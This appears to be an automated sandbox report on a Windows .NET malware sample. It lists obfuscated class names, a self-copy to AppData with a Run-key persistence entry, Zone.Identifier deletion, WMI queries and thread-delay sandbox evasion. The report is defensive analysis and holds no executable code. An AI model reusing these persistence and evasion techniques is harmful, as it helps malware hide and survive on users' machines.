                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, eFbwqseeQJnslq7RDgX.cs | High entropy of concatenated method names: 'ToString', 'w0XOuNICc3', 'vaYOqyDgBe', 'uGsO76rLOm', 'FbWOTpEQsy', 'pwnOJg8t70', 'HPTOEMocDL', 'Ls6OBaQNJ6', 'rFuI4lPxwIXkR6VXplG', 'dBSTwmPzi37Np5amv94'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, CqTErPPhFYaD5LQ6TP.cs | High entropy of concatenated method names: 'Jow5tRMrIr', 'Vtv50UEnKd', 'ToString', 'Gdc5T8eOtd', 'wmD5JYZ9Mb', 'Tmc5ELEpAl', 'kP85BUIDcQ', 'mRM5U9C0JV', 'DLQ5n7X5PC', 'McY53TyA3C'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, j21in5yVGLEM0360j8.cs | High entropy of concatenated method names: 'YRDy0WrpK', 'OFKkwQgS6', 'D1WFyGTfI', 'uyhCYjXJd', 'pefRGc0xX', 'R1KMFsmYJ', 'B8fO809gmGgQfT5aPE', 'zoA9UYo7AbkpggaFK3', 'Kgk80KIK7', 'udbOphJqA'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, avfUgueg8O5E6WTR2iN.cs | High entropy of concatenated method names: 'BpBrXXR2M4', 'RhRr6TWPjl', 'DHNryoIfBm', 'pfMrk24MPn', 'qpLrlQWCEY', 'Po3rFs8tOC', 'r3drClycdm', 'AWSrj2L4Uc', 'YbcrR9igfL', 'eHurMZK3BD'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, rU56x3nqyE643hqfjy.cs | High entropy of concatenated method names: 'c1tNnpXhbH', 'BY7N3v2ENh', 'zbXNtVusxl', 'QkFN0obkx7', 'OJtNeykL8l', 'JEoNbGhgmY', 'dEYJCHOKfVpcG0Jrj0', 'NQMJjLCg17Zx2MEfFZ', 'JuONNYxWhK', 'kqrNuqy96l'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.cs | High entropy of concatenated method names: 'AgRu7nhUWk', 'wRjuT4t5cw', 'dA4uJgP0jn', 'PvBuEF6J5y', 'hMUuBJREL1', 'TC8uUdeWId', 'xuMunQ3nuC', 'fnVu3lbXy4', 'JFAuGsjecx', 'eZuutf5CAm'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, xjvwbyYXDQ5yAjhT6V.cs | High entropy of concatenated method names: 'V0lU7xy1FK', 'cCZUJHX0UM', 'QSVUBheX0a', 'QPvUn9643w', 'GVXU3NTAQQ', 'FpPBQDOw1G', 'wwhBamCGe5', 'CTFBVubfLs', 't3EBAr5mM0', 'qKQBiHwCXB'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, BTh9fEIFxhSR4C1soA.cs | High entropy of concatenated method names: 'SmBBlEdGPT', 'G7eBCM0fR8', 'BCVEoGaeYq', 'aTHEWbCyi6', 'dtoEIb9ClA', 'YIdEY4VDHh', 'GsBEpDQwWN', 'HKZEfgfWTE', 'CKuE1flDgy', 'J2SEPZcBMJ'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, w58GgSNlKHJbjw5uF2.cs | High entropy of concatenated method names: 'hQH2jBR4nH', 'WvX2RysMVl', 'nP82SQiyvk', 'VkW2mHNm9Z', 'rG62Wo6ihd', 'GIv2IlFp7p', 'K0A2peOJ1x', 'naR2fToKUU', 'xL12Pu8ELL', 'QwX29cMNHU'
                    Source: 0.2.Eschemyquote24573j33.exe.294a200.0.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                    Source: 0.2.Eschemyquote24573j33.exe.294a200.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, UlyEHKDV3LaCLLom7F.cs | High entropy of concatenated method names: 'pH1nT0iaOY', 'FQNnEB4jwZ', 'hMWnUogfXy', 'QLYUxgPJ8s', 'oF7Uz4tlBf', 'K19nKoUx7B', 'A5tnNZEGNZ', 'PDNnZa4gaA', 'AC4nu0RQSL', 'nQhnqmZFJZ'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, hIgUhVm92GZDPRtBZs.cs | High entropy of concatenated method names: 'aEerNH6Pee', 'e1Crux6uG0', 'T7rrqU0eyk', 's7HrTZ4tfw', 'mCDrJsHC5n', 'oL5rBfBvT2', 'DDnrU9fksV', 'YkD8Vr7oxG', 'uLP8AV5rwc', 'afE8iWwyid'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, tnUsWDzA62wbjJK7EM.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sQUr2Tcm5c', 'a9Zre2D0PL', 'Ue7rbCnods', 'pgwr5oOjgu', 'x4Rr8D34RW', 'lA6rrDWMI5', 'EXprOhZX7I'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, VWsQCrlF0Gyb1uODge.cs | High entropy of concatenated method names: 'eDv8TU0X3D', 'NDL8JxENm7', 'Q5X8EvdfPD', 'T0s8BeLCP7', 'yn48UXqALy', 'q578n3f8YE', 'msO83F7Vj0', 'tTb8GM1mb9', 's4y8tMaySv', 'Mub80LT52g'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, Kr6tTfhpAfgPwUsiHt.cs | High entropy of concatenated method names: 'Dispose', 'oOrNiYOKbf', 'w8MZm4XS2y', 'SrxDD81xHF', 's86NxNKYLD', 'QJLNzjicse', 'ProcessDialogKey', 'E9lZKtXedb', 'CWGZNT5rxG', 'CQwZZelvbL'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, xGr7Z2GEn7B188JC2j.cs | High entropy of concatenated method names: 'qii5AAueNq', 'fyX5xHhgZc', 'gI88Kh75ro', 'obf8N2wUcD', 'Djh59XZles', 'tmg5c3xJun', 'a7p5gweeln', 'TOX54Pe9Rk', 'aAF5H2EGrx', 'p2q5L91nxg'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, VY8MeekEpUrCIR70BG.cs | High entropy of concatenated method names: 'dTkEko97C5', 'YjOEFhMteY', 'nuDEjSZtYX', 'vmoERBXiTG', 'OnMEe9baGO', 'wDCEbEucwY', 'oDwE59Wkda', 'rQIE8lH3JX', 'voQErBa3bM', 'iEoEOMMKqC'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, HABTMne0v4CLRfMopA9.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C8rO44BB6u', 'hNyOHjeFHF', 'QxBOLoQMGh', 'fwbOvdv3f2', 'E47OQAiiwx', 'iYsOap421y', 'lXKOVFcXrV'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, PrUsrswPYsf1O0VuSQ.cs | High entropy of concatenated method names: 'H4AJ4j3ilH', 'wsyJH4d698', 'MJaJLoZ7oY', 'RUlJvFRcV4', 'a5LJQ2g69H', 'FYtJad7KGm', 'X6AJVn4jSw', 'owoJAltLbl', 'GAVJitwjyS', 'hXXJx4GMn2'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, Y4AIJCVq0AJhyrGakh.cs | High entropy of concatenated method names: 'WSe8SZ3YF4', 'pti8mWX9em', 'vmZ8oqtDPE', 'hkb8WUToAC', 'A7f84TLLCY', 'xxe8ItRbog', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, xeO7gIW6JJoYZalNAu.cs | High entropy of concatenated method names: 'SHqnX5xpDD', 'yrqn6UQZpy', 'n99nyv3JvF', 'Tcknk910Ni', 'O23nl1DQiq', 'jvcnFbBPgv', 'TEFnCUUSFt', 'yFsnjrQFDE', 'Qb4nRV0JWX', 'QuRnMayd87'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, EeXc16K8feKegOUF9O.cs | High entropy of concatenated method names: 'zDwuy78Yq0GHpy02baO', 'NmcrW48t4xKZ5ETtqDB', 'BUkU83I4oM', 'v6iUrbcFMe', 'vd1UO1sF6l', 'tHtWgg85kIrTrMFsJv8', 'ycINcn8bJuHIaQB7d7P', 'tu0PNV8gRkNd9YOnaqE'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, vwPnnh1JETgPmNWxFh.cs | High entropy of concatenated method names: 'kH4ePI6d2w', 'ay0ec9sgde', 'SNee47thXv', 'AFIeHMbpLT', 'MIGemZPTPT', 'HbaeomHW6J', 'JiheWL44nK', 'sMIeIQeG1N', 'NGNeYJvkHT', 'EonepykAOn'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, QsbL7G6byXSclr7ntR.cs | High entropy of concatenated method names: 'QfYULBZAOE', 'JSeUv4Q8OK', 'RO9UQXHnKs', 'ToString', 'XkeUad4Yfw', 'ww3UVnAuxM', 'Jlry9P8avPvmYsH7kUq', 'dy0Uir8T4B5SaJE8191', 'r6TWWP8JqsdkxTFhbjw'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, eFbwqseeQJnslq7RDgX.cs | High entropy of concatenated method names: 'ToString', 'w0XOuNICc3', 'vaYOqyDgBe', 'uGsO76rLOm', 'FbWOTpEQsy', 'pwnOJg8t70', 'HPTOEMocDL', 'Ls6OBaQNJ6', 'rFuI4lPxwIXkR6VXplG', 'dBSTwmPzi37Np5amv94'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, CqTErPPhFYaD5LQ6TP.cs | High entropy of concatenated method names: 'Jow5tRMrIr', 'Vtv50UEnKd', 'ToString', 'Gdc5T8eOtd', 'wmD5JYZ9Mb', 'Tmc5ELEpAl', 'kP85BUIDcQ', 'mRM5U9C0JV', 'DLQ5n7X5PC', 'McY53TyA3C'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, j21in5yVGLEM0360j8.cs | High entropy of concatenated method names: 'YRDy0WrpK', 'OFKkwQgS6', 'D1WFyGTfI', 'uyhCYjXJd', 'pefRGc0xX', 'R1KMFsmYJ', 'B8fO809gmGgQfT5aPE', 'zoA9UYo7AbkpggaFK3', 'Kgk80KIK7', 'udbOphJqA'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, avfUgueg8O5E6WTR2iN.cs | High entropy of concatenated method names: 'BpBrXXR2M4', 'RhRr6TWPjl', 'DHNryoIfBm', 'pfMrk24MPn', 'qpLrlQWCEY', 'Po3rFs8tOC', 'r3drClycdm', 'AWSrj2L4Uc', 'YbcrR9igfL', 'eHurMZK3BD'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, rU56x3nqyE643hqfjy.cs | High entropy of concatenated method names: 'c1tNnpXhbH', 'BY7N3v2ENh', 'zbXNtVusxl', 'QkFN0obkx7', 'OJtNeykL8l', 'JEoNbGhgmY', 'dEYJCHOKfVpcG0Jrj0', 'NQMJjLCg17Zx2MEfFZ', 'JuONNYxWhK', 'kqrNuqy96l'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.cs | High entropy of concatenated method names: 'AgRu7nhUWk', 'wRjuT4t5cw', 'dA4uJgP0jn', 'PvBuEF6J5y', 'hMUuBJREL1', 'TC8uUdeWId', 'xuMunQ3nuC', 'fnVu3lbXy4', 'JFAuGsjecx', 'eZuutf5CAm'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, xjvwbyYXDQ5yAjhT6V.cs | High entropy of concatenated method names: 'V0lU7xy1FK', 'cCZUJHX0UM', 'QSVUBheX0a', 'QPvUn9643w', 'GVXU3NTAQQ', 'FpPBQDOw1G', 'wwhBamCGe5', 'CTFBVubfLs', 't3EBAr5mM0', 'qKQBiHwCXB'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, BTh9fEIFxhSR4C1soA.cs | High entropy of concatenated method names: 'SmBBlEdGPT', 'G7eBCM0fR8', 'BCVEoGaeYq', 'aTHEWbCyi6', 'dtoEIb9ClA', 'YIdEY4VDHh', 'GsBEpDQwWN', 'HKZEfgfWTE', 'CKuE1flDgy', 'J2SEPZcBMJ'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, w58GgSNlKHJbjw5uF2.cs | High entropy of concatenated method names: 'hQH2jBR4nH', 'WvX2RysMVl', 'nP82SQiyvk', 'VkW2mHNm9Z', 'rG62Wo6ihd', 'GIv2IlFp7p', 'K0A2peOJ1x', 'naR2fToKUU', 'xL12Pu8ELL', 'QwX29cMNHU'
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | File created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwT (2 identical entries)

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | File opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process information set: NOOPENFILEERRORBOX (56 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match; File source: Process Memory Space: Eschemyquote24573j33.exe PID: 4332, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: ctsdvwT.exe PID: 7104, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 2750000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 2900000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 2770000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 7AB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 8AB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 8C70000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 9C70000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 3270000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 3310000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Memory allocated: 5310000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 1280000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 2C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 2AB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 79E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 89E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 8B90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 9B90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 1870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 3390000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 31A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 13C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 2E40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 2B90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 7BA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 8BA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 8D50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 9D50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 1810000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 3190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe; Memory allocated: 5190000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2400000
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399875
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399765
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399654
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399546
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399431
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399327
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399216
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399109
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2399000
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2398890
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe; Thread delayed: delay time: 2398780
